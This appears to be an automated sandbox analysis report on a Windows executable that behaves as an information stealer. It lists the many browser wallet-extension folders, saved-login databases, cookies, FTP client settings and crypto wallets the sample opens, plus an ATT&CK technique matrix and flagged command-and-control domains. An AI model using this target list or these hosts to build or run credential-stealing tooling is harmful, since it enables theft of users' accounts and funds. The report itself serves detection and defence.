                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\Desktop\NHEXQatKdE.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: Yara matchFile source: 00000004.00000003.2560508442.0000000000F54000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: NHEXQatKdE.exe PID: 4156, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: Process Memory Space: NHEXQatKdE.exe PID: 4156, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Windows Management Instrumentation
                1
                DLL Side-Loading
                211
                Process Injection
                11
                Virtualization/Sandbox Evasion
                2
                OS Credential Dumping
                1
                System Time Discovery
                Remote Services1
                Archive Collected Data
                21
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                PowerShell
                Boot or Logon Initialization Scripts1
                DLL Side-Loading
                211
                Process Injection
                LSASS Memory1
                Query Registry
                Remote Desktop Protocol41
                Data from Local System
                2
                Non-Application Layer Protocol
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Deobfuscate/Decode Files or Information
                Security Account Manager141
                Security Software Discovery
                SMB/Windows Admin Shares2
                Clipboard Data
                113
                Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
                Obfuscated Files or Information
                NTDS11
                Virtualization/Sandbox Evasion
                Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Software Packing
                LSA Secrets1
                Process Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading
                Cached Domain Credentials11
                File and Directory Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync23
                System Information Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                NHEXQatKdE.exe61%ReversingLabsWin32.Packed.Generic
                NHEXQatKdE.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://grannyejh.lat/7100%Avira URL Cloudmalware
                https://grannyejh.lat/z100%Avira URL Cloudmalware
                https://grannyejh.lat/piN100%Avira URL Cloudmalware
                https://grannyejh.lat/4100%Avira URL Cloudmalware
                https://grannyejh.lat/v100%Avira URL Cloudmalware
                https://grannyejh.lat:443/api/100%Avira URL Cloudmalware
                https://grannyejh.lat/E100%Avira URL Cloudmalware
                https://grannyejh.lat/N100%Avira URL Cloudmalware
                http://crl.microsoft.0%Avira URL Cloudsafe
                https://grannyejh.lat:443/apiw100%Avira URL Cloudmalware
                https://contile-images.serv0%Avira URL Cloudsafe
                https://grannyejh.lat/c100%Avira URL Cloudmalware
                https://grannyejh.lat/d100%Avira URL Cloudmalware
                NameIPActiveMaliciousAntivirus DetectionReputation
                grannyejh.lat
                172.67.179.109
                truefalse
                  high
                  sweepyribs.lat
                  unknown
                  unknownfalse
                    high
                    NameMaliciousAntivirus DetectionReputation
                    necklacebudi.latfalse
                      high
                      aspecteirs.latfalse
                        high
                        sweepyribs.latfalse
                          high
                          sustainskelet.latfalse
                            high
                            crosshuaht.latfalse
                              high
                              rapeflowwj.latfalse
                                high
                                energyaffai.latfalse
                                  high
                                  https://grannyejh.lat/apifalse
                                    high
                                    grannyejh.latfalse
                                      high
                                      discokeyus.latfalse
                                        high
                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://duckduckgo.com/chrome_newtabNHEXQatKdE.exe, 00000004.00000003.2288139175.00000000034D9000.00000004.00000800.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000003.2288234358.00000000034D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://grannyejh.lat/zNHEXQatKdE.exe, 00000004.00000003.2922841372.0000000000F07000.00000004.00000020.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000002.2923597402.0000000000F07000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://duckduckgo.com/ac/?q=NHEXQatKdE.exe, 00000004.00000003.2288139175.00000000034D9000.00000004.00000800.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000003.2288234358.00000000034D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#NHEXQatKdE.exefalse
                                              high
                                              http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0NHEXQatKdE.exefalse
                                                high
                                                http://ocsp.sectigo.com0NHEXQatKdE.exefalse
                                                  high
                                                  https://grannyejh.lat/vNHEXQatKdE.exe, 00000004.00000003.2922757214.0000000000F60000.00000004.00000020.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000002.2923799804.0000000000F62000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=NHEXQatKdE.exe, 00000004.00000003.2288139175.00000000034D9000.00000004.00000800.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000003.2288234358.00000000034D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#NHEXQatKdE.exefalse
                                                      high
                                                      https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpgNHEXQatKdE.exe, 00000004.00000003.2494211477.0000000003499000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0NHEXQatKdE.exefalse
                                                          high
                                                          https://grannyejh.lat:443/apiNHEXQatKdE.exe, 00000004.00000002.2923597402.0000000000EE7000.00000004.00000020.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000003.2922841372.0000000000EE7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            http://crl.micro(NHEXQatKdE.exe, 00000004.00000003.2718810987.0000000000F4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              http://x1.c.lencr.org/0NHEXQatKdE.exe, 00000004.00000003.2492453188.00000000034AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://x1.i.lencr.org/0NHEXQatKdE.exe, 00000004.00000003.2492453188.00000000034AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchNHEXQatKdE.exe, 00000004.00000003.2288139175.00000000034D9000.00000004.00000800.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000003.2288234358.00000000034D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://grannyejh.lat:443/api/NHEXQatKdE.exe, 00000004.00000002.2923597402.0000000000EE7000.00000004.00000020.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000003.2922841372.0000000000EE7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: malware
                                                                    unknown
                                                                    https://support.mozilla.org/products/firefoxgro.allNHEXQatKdE.exe, 00000004.00000003.2493814960.00000000037BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://www.mozilla.orNHEXQatKdE.exe, 00000004.00000003.2493650462.00000000034AA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#NHEXQatKdE.exefalse
                                                                          high
                                                                          https://grannyejh.lat/piNNHEXQatKdE.exe, 00000004.00000002.2924163388.0000000003526000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: malware
                                                                          unknown
                                                                          https://grannyejh.lat/7NHEXQatKdE.exe, 00000004.00000003.2560537533.0000000000F5F000.00000004.00000020.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000003.2560508442.0000000000F54000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: malware
                                                                          unknown
                                                                          https://sectigo.com/CPS0NHEXQatKdE.exefalse
                                                                            high
                                                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icoNHEXQatKdE.exe, 00000004.00000003.2288139175.00000000034D9000.00000004.00000800.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000003.2288234358.00000000034D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.NHEXQatKdE.exe, 00000004.00000003.2494211477.0000000003499000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://grannyejh.lat/4NHEXQatKdE.exe, 00000004.00000002.2924163388.0000000003526000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: malware
                                                                                unknown
